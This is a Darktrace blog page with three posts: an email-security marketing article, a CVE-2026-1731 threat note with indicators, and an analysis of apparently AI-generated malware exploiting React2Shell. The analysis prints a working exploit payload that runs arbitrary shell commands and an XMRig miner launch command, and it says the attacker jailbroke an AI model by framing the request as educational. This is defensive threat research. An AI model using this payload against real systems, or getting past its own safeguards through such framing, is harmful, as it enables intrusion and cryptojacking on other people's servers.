Blog
/
Email
/
March 29, 2023

Email Security & Future Innovations: Educating Employees

As online attackers change to targeted and sophisticated attacks, Darktrace stresses the importance of protection and utilizing steady verification codes.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Dan Fein
VP, Product
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
29
Mar 2023

In an escalating threat landscape with email as the primary target, IT teams need to move far beyond traditional methods of email security that haven’t evolved fast enough – they’re trained on historical attack data, so only catch what they’ve seen before. By design, they are permanently playing catch up to continually innovating attackers, taking an average of 13 days to recognize new attacks[1]

Phishing attacks are getting more targeted and sophisticated as attackers innovate in two key areas: delivery tactics, and social engineering. On the malware delivery side, attackers are increasingly ‘piggybacking’ off the legitimate infrastructure and reputations of services like SharePoint and OneDrive, as well as legitimate email accounts, to evade security tools. 

To evade the human on the other end of the email, attackers are tapping into new social engineering tactics, exploiting fear, uncertainty, and doubt (FUD) and evoking a sense of urgency as ever, but now have tools at their disposal to enable tailored and personalized social engineering at scale. 

With the help of tools such as ChatGPT, threat actors can leverage AI technologies to impersonate trusted organizations and contacts – including damaging business email compromises, realistic spear phishing, spoofing, and social engineering. In fact, Darktrace found that the average linguistic complexity of phishing emails has jumped by 17% since the release of ChatGPT.  

This is just one example of accelerating attack sophistication – lowering the barrier to entry and improving outcomes for attackers. It forms part of a wider trend of the attack landscape moving from low-sophistication, low-impact, and generic phishing tactics - a 'spray and pray' approach - to more targeted, sophisticated, and higher impact attacks that fall outside of the typical detection remit for any tool relying on rules and signatures. Generative AI and other technologies in the attackers' toolkit will soon enable the launch of these attacks at scale, and only being able to catch known threats that have been seen before will no longer be enough.

Figure 1: The progression of attacks and relative coverage of email security tools

In an escalating threat landscape with email as the primary target, the vast majority of email security tools haven't evolved fast enough – they’re trained on historical attack data, so only catch what they’ve seen before. They look to the past to try and predict the next attack, and are designed to catch today’s attacks tomorrow.

Organizations are increasingly moving towards AI systems, but not all AI is the same, and the application of that AI is crucial. IT and security teams need to move towards email security that is context-aware and leverages AI for deep behavioral analysis. And it’s a proven approach, successfully catching attacks that slip by other tools across thousands of organizations. And email security today needs to be more about just protecting the inbox. It needs to address not just malicious emails, but the full 360-degree view of a user across their email messages and accounts, as well as extended coverage where email bleeds into collaboration tools/SaaS. For many organizations, the question is not if they should upgrade their email security, but when – how much longer can they risk relying on email security that’s stuck looking to the past?  

The Email Security Industry: Playing Catch-Up

Gateways and ICES (Integrated Cloud Email Security) providers have something in common: they look to past attacks in order to try to predict the future. They often rely on previous threat intelligence and on assembling ‘deny-lists’ of known bad elements of emails already identified as malicious – these tools fail to meet the reality of the contemporary threat landscape. Some of these tools attempt to use AI to improve this flawed approach, looking not only for direct matches, but using "data augmentation" to try and find similar-looking emails. But this approach is still inherently blind to novel threats. 

These tools tend to be resource-intensive, requiring constant policy maintenance combined with the hand-to-hand combat of releasing held-but-legitimate emails and holding back malicious phishing emails. This burden of manually releasing individual emails typically falls on security teams, teams that are frequently small with multiple areas of responsibility. The solution is to deploy technology that autonomously stops the bad while allowing the good through, and adapts to changes in the organization – technology that actually fits the definition of ‘set and forget’.  

Becoming behavioral and context-aware  

There is a seismic shift underway in the industry, from “secure” email gateways to intelligent AI-driven thinking. The right approach is to understand the behaviors of end users – how each person uses their inbox and what constitutes ‘normal’ for each user – in order to detect what’s not normal. It makes use of context – how and when people communicate, and with who – to spot the unusual and to flag to the user when something doesn’t look quite right – and why. Basically, a system that understands you. Not past attacks.  

Darktrace has developed a fundamentally different approach to AI, one that doesn’t learn what’s dangerous from historical data but from a deep continuous understanding of each organization and their users. Only a complex understanding of the normal day-to-day behavior of each employee can accurately determine whether or not an email actually belongs in that recipient’s inbox. 

Whether it’s phishing, ransomware, invoice fraud, executive impersonation, or a novel technique, leveraging AI for behavioral analysis allows for faster decision-making – it doesn’t need to wait for a Patient Zero to contain a new attack because it can stop malicious threats on first encounter. This increased confidence in detection allows for more a precise response – targeted action to remove only the riskiest parts of an email, rather than taking a broad blanket response out of caution – in order to reduce risk with minimal disruption to the business. 

Returning to our attack spectrum, as the attack landscape moves increasingly towards highly sophisticated attacks that use novel or seemingly legitimate infrastructure to deliver malware and induce victims, it has never been more important to detect and issue an appropriate response to these high-impact and targeted attacks. 

Fig 2: How Darktrace combined with native email security to cover the full spectrum of attacks

Understanding you and a 360° view of the end user  

We know that modern email security isn’t limited to the inbox alone – it has to encompass a full understanding of a user’s normal behavior across email and beyond. Traditional email tools are focused solely on inbound email as the point of breach, which fails to protect against the potentially catastrophic damage caused by a successful email attack once an account has been compromised.    

Fig 3: A 360° understanding of a user reveals their digital touchpoints beyond Microsoft

In order to have complete context around what is normal for a user, it’s crucial to understand their activity within Microsoft 365, Google Workspace, Salesforce, Dropbox, and even their device on the network. Monitoring devices (as well as inboxes) for symptoms of infection is crucial to determining whether or not an email has been malicious, and if similar emails need to be withheld in the future. Combining with data from cloud apps enables a more holistic view of identity-based attacks. 

Understanding a user in the context of the whole organization – which also means network, cloud, and endpoint data – brings additional context to light to improve decision making, and connecting email security with external data on the attack surface can help proactively find malicious domains, so that defenses can be hardened before an attack is even launched.

Educating and Engaging Your Employees

Ultimately, it’s employees who interact with any given email. If organizations can successfully empower this user base, they will end up with a smarter workforce, fewer successful attacks, and a security team with more time on their hands for better, strategic work. 

The tools that succeed best will be those that can leverage AI to help employees become more security-conscious. While some emails are evidently malicious and should never enter an employee’s inbox, there is a significant grey area of emails that have potentially risky elements. The majority of security tools will either withhold these emails completely – even though they might be business critical – or let them through scot-free. But what if these grey-area emails could in fact be used as training opportunities?    

As opposed to phishing simulation vendors, behavioral AI can improve security awareness holistically throughout organizations by training users with a light touch via their own inboxes – bringing the end user into the loop to harden defenses.  

The new frontier of email security fights AI with AI, and organizations who lag behind might end up learning the hard way. Read on for our blog series about how these technologies can transform the employee experience, dynamize deployment, augment security teams and form part of an integrated defensive loop.    

[1] 13 days is the mean average of phishing payloads active in the wild between the response of Darktrace/Email compared to the earliest of 16 independent feeds submitted by other email security technologies.

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Dan Fein
VP, Product

Blog

/

/

February 13, 2026

CVE-2026-1731: How Darktrace Sees the BeyondTrust Exploitation Wave Unfolding

Default blog imageDefault blog image

Note: Darktrace's Threat Research team is publishing now to help defenders. We will update continue updating this blog as our investigations unfold.

Background

On February 6, 2026, the Identity & Access Management solution BeyondTrust announced patches for a vulnerability, CVE-2026-1731, which enables unauthenticated remote code execution using specially crafted requests.  This vulnerability affects BeyondTrust Remote Support (RS) and particular older versions of Privileged Remote Access (PRA) [1].

A Proof of Concept (PoC) exploit for this vulnerability was released publicly on February 10, and open-source intelligence (OSINT) reported exploitation attempts within 24 hours [2].

Previous intrusions against Beyond Trust technology have been cited as being affiliated with nation-state attacks, including a 2024 breach targeting the U.S. Treasury Department. This incident led to subsequent emergency directives from  the Cybersecurity and Infrastructure Security Agency (CISA) and later showed attackers had chained previously unknown vulnerabilities to achieve their goals [3].

Additionally, there appears to be infrastructure overlap with React2Shell mass exploitation previously observed by Darktrace, with command-and-control (C2) domain  avg.domaininfo[.]top seen in potential post-exploitation activity for BeyondTrust, as well as in a React2Shell exploitation case involving possible EtherRAT deployment.

Darktrace Detections

Darktrace’s Threat Research team has identified highly anomalous activity across several customers that may relate to exploitation of BeyondTrust since February 10, 2026. Observed activities include:

-              Outbound connections and DNS requests for endpoints associated with Out-of-Band Application Security Testing; these services are commonly abused by threat actors for exploit validation.  Associated Darktrace models include:

o    Compromise / Possible Tunnelling to Bin Services

-              Suspicious executable file downloads. Associated Darktrace models include:

o    Anomalous File / EXE from Rare External Location

-              Alerts for the model

o    Compromise / Rare Domain Pointing to Internal IP

-              Outbound beaconing to rare domains. Associated Darktrace models include:

o   Compromise / Agent Beacon (Medium Period)

o   Compromise / Agent Beacon (Long Period)

o   Compromise / Sustained TCP Beaconing Activity To Rare Endpoint

o   Compromise / Beacon to Young Endpoint

o   Anomalous Server Activity / Rare External from Server

o   Compromise / SSL Beaconing to Rare Destination

-              Unusual cryptocurrency mining activity. Associated Darktrace models include:

o   Compromise / Monero Mining

o   Compromise / High Priority Crypto Currency Mining

IT Defenders: As part of best practices, we highly recommend employing an automated containment solution in your environment. For Darktrace customers, please ensure that Autonomous Response is configured correctly. More guidance regarding this activity and suggested actions can be found in the Darktrace Customer Portal.  

Appendices

Potential indicators of post-exploitation behavior:

·      217.76.57[.]78 – IP address - Likely C2 server

·      hXXp://217.76.57[.]78:8009/index.js - URL -  Likely payload

·      b6a15e1f2f3e1f651a5ad4a18ce39d411d385ac7  - SHA1 - Likely payload

·      195.154.119[.]194 – IP address – Likely C2 server

·      hXXp://195.154.119[.]194/index.js - URL – Likely payload

·      avg.domaininfo[.]top – Hostname – Likely C2 server

·      104.234.174[.]5 – IP address - Possible C2 server

·      35da45aeca4701764eb49185b11ef23432f7162a – SHA1 – Possible payload

·      hXXp://134.122.13[.]34:8979/c - URL – Possible payload

·      134.122.13[.]34 – IP address – Possible C2 server

·      28df16894a6732919c650cc5a3de94e434a81d80 - SHA1 - Possible payload

References:

1.        https://nvd.nist.gov/vuln/detail/CVE-2026-1731

2.        https://www.securityweek.com/beyondtrust-vulnerability-targeted-by-hackers-within-24-hours-of-poc-release/

3.        https://www.rapid7.com/blog/post/etr-cve-2026-1731-critical-unauthenticated-remote-code-execution-rce-beyondtrust-remote-support-rs-privileged-remote-access-pra/

Continue reading
About the author
Emma Foulger
Global Threat Research Operations Lead

Blog

/

Network

/

February 10, 2026

AI/LLM-Generated Malware Used to Exploit React2Shell

AI/LLM-Generated Malware Used to Exploit React2ShellDefault blog imageDefault blog image

Introduction

To observe adversary behavior in real time, Darktrace operates a global honeypot network known as “CloudyPots”, designed to capture malicious activity across a wide range of services, protocols, and cloud platforms. These honeypots provide valuable insights into the techniques, tools, and malware actively targeting internet‑facing infrastructure.

A recently observed intrusion against Darktrace’s Cloudypots environment revealed a fully AI‑generated malware sample exploiting CVE-2025-55182, also known as React2Shell. As AI‑assisted software development (“vibecoding”) becomes more widespread, attackers are increasingly leveraging large language models to rapidly produce functional tooling. This incident illustrates a broader shift: AI is now enabling even low-skill operators to generate effective exploitation frameworks at speed. This blog examines the attack chain, analyzes the AI-generated payload, and outlines what this evolution means for defenders.

Initial access

The intrusion was observed against the Darktrace Docker honeypot, which intentionally exposes the Docker daemon internet-facing with no authentication. This configuration allows any attacker to discover the daemon and create a container via the Docker API.

The attacker was observed spawning a container named “python-metrics-collector”, configured with a start up command that first installed prerequisite tools including curl, wget, and python 3.

Container spawned with the name ‘python-metrics-collector’.
Figure 1: Container spawned with the name ‘python-metrics-collector’.

Subsequently, it will download a list of required python packages from

  • hxxps://pastebin[.]com/raw/Cce6tjHM,

Finally it will download and run a python script from:

  • hxxps://smplu[.]link/dockerzero.

This link redirects to a GitHub Gist hosted by user “hackedyoulol”, who has since been banned from GitHub at time of writing.

  • hxxps://gist.githubusercontent[.]com/hackedyoulol/141b28863cf639c0a0dd563344101f24/raw/07ddc6bb5edac4e9fe5be96e7ab60eda0f9376c3/gistfile1.txt

Notably the script did not contain a docker spreader – unusual for Docker-focused malware – indicating that propagation was likely handled separately from a centralized spreader server.

Deployed components and execution chain

The downloaded Python payload was the central execution component for the intrusion. Obfuscation by design within the sample was reinforced between the exploitation script and any spreading mechanism. Understanding that docker malware samples typically include their own spreader logic, the omission suggests that the attacker maintained and executed a dedicated spreading tool remotely.

The script begins with a multi-line comment:
"""
   Network Scanner with Exploitation Framework
   Educational/Research Purpose Only
   Docker-compatible: No external dependencies except requests
"""

This is very telling, as the overwhelming majority of samples analysed do not feature this level of commentary in files, as they are often designed to be intentionally difficult to understand to hinder analysis. Quick scripts written by human operators generally prioritize speed and functionality over clarity. LLMs on the other hand will document all code with comments very thoroughly by design, a pattern we see repeated throughout the sample.  Further, AI will refuse to generate malware as part of its safeguards.

The presence of the phrase “Educational/Research Purpose Only” additionally suggests that the attacker likely jailbroke an AI model by framing the malicious request as educational.

When portions of the script were tested in AI‑detection software, the output further indicated that the code was likely generated by a large language model.

GPTZero AI-detection results indicating that the script was likely generated using an AI model.
Figure 2: GPTZero AI-detection results indicating that the script was likely generated using an AI model.

The script is a well constructed React2Shell exploitation toolkit, which aims to gain remote code execution and deploy a XMRig (Monero) crypto miner. It uses an IP‑generation loop to identify potential targets and executes a crafted exploitation request containing:

  • A deliberately structured Next.js server component payload
  • A chunk designed to force an exception and reveal command output
  • A child process invocation to run arbitrary shell commands

    def execute_rce_command(base_url, command, timeout=120):  
    """ ACTUAL EXPLOIT METHOD - Next.js React Server Component RCE
    DO NOT MODIFY THIS FUNCTION
    Returns: (success, output)  
    """  
    try: # Disable SSL warnings     urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

 crafted_chunk = {
      "then": "$1:__proto__:then",
      "status": "resolved_model",
      "reason": -1,
      "value": '{"then": "$B0"}',
      "_response": {
          "_prefix": f"var res = process.mainModule.require('child_process').execSync('{command}', {{encoding: 'utf8', maxBuffer: 50 * 1024 * 1024, stdio: ['pipe', 'pipe', 'pipe']}}).toString(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});",
          "_formData": {
              "get": "$1:constructor:constructor",
          },
      },
  }

  files = {
      "0": (None, json.dumps(crafted_chunk)),
      "1": (None, '"$@0"'),
  }

  headers = {"Next-Action": "x"}

  res = requests.post(base_url, files=files, headers=headers, timeout=timeout, verify=False)

This function is initially invoked with ‘whoami’ to determine if the host is vulnerable, before using wget to download XMRig from its GitHub repository and invoking it with a configured mining pool and wallet address.

]\

WALLET = "45FizYc8eAcMAQetBjVCyeAs8M2ausJpUMLRGCGgLPEuJohTKeamMk6jVFRpX4x2MXHrJxwFdm3iPDufdSRv2agC5XjykhA"
XMRIG_VERSION = "6.21.0"
POOL_PORT_443 = "pool.supportxmr.com:443"
...
print_colored(f"[EXPLOIT] Starting miner on {identifier} (port 443)...", 'cyan')  
miner_cmd = f"nohup xmrig-{XMRIG_VERSION}/xmrig -o {POOL_PORT_443} -u {WALLET} -p {worker_name} --tls -B >/dev/null 2>&1 &"

success, _ = execute_rce_command(base_url, miner_cmd, timeout=10)

Many attackers do not realise that while Monero uses an opaque blockchain (so transactions cannot be traced and wallet balances cannot be viewed), mining pools such as supportxmr will publish statistics for each wallet address that are publicly available. This makes it trivial to track the success of the campaign and the earnings of the attacker.

 The supportxmr mining pool overview for the attackers wallet address
Figure 3: The supportxmr mining pool overview for the attackers wallet address

Based on this information we can determine the attacker has made approx 0.015 XMR total since the beginning of this campaign, which as of writing is valued at £5. Per day, the attacker is generating 0.004 XMR, which is £1.33 as of writing. The worker count is 91, meaning that 91 hosts have been infected by this sample.

Conclusion

While the amount of money generated by the attacker in this case is relatively low, and cryptomining is far from a new technique, this campaign is proof that AI based LLMs have made cybercrime more accessible than ever. A single prompting session with a model was sufficient for this attacker to generate a functioning exploit framework and compromise more than ninety hosts, demonstrating that the operational value of AI for adversaries should not be underestimated.

CISOs and SOC leaders should treat this event as a preview of the near future. Threat actors can now generate custom malware on demand, modify exploits instantly, and automate every stage of compromise. Defenders must prioritize rapid patching, continuous attack surface monitoring, and behavioral detection approaches. AI‑generated malware is no longer theoretical — it is operational, scalable, and accessible to anyone.

Analyst commentary

It is worth noting that the downloaded script does not appear to include a Docker spreader, meaning the malware will not replicate to other victims from an infected host. This is uncommon for Docker malware, based on other samples analyzed by Darktrace researchers. This indicates that there is a separate script responsible for spreading, likely deployed by the attacker from a central spreader server. This theory is supported by the fact that the IP that initiated the connection, 49[.]36.33.11, is registered to a residential ISP in India. While it is possible the attacker is using a residential proxy server to cover their tracks, it is also plausible that they are running the spreading script from their home computer. However, this should not be taken as confirmed attribution.

Credit to Nathaniel Bill (Malware Research Engineer), Nathaniel Jones ( VP Threat Research | Field CISO AI Security)

Edited by Ryan Traill (Analyst Content Lead)

Indicators of Compromise (IoCs)

Spreader IP - 49[.]36.33.11
Malware host domain - smplu[.]link
Hash - 594ba70692730a7086ca0ce21ef37ebfc0fd1b0920e72ae23eff00935c48f15b
Hash 2 - d57dda6d9f9ab459ef5cc5105551f5c2061979f082e0c662f68e8c4c343d667d

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer
Your data. Our AI.
Elevate your network security with Darktrace AI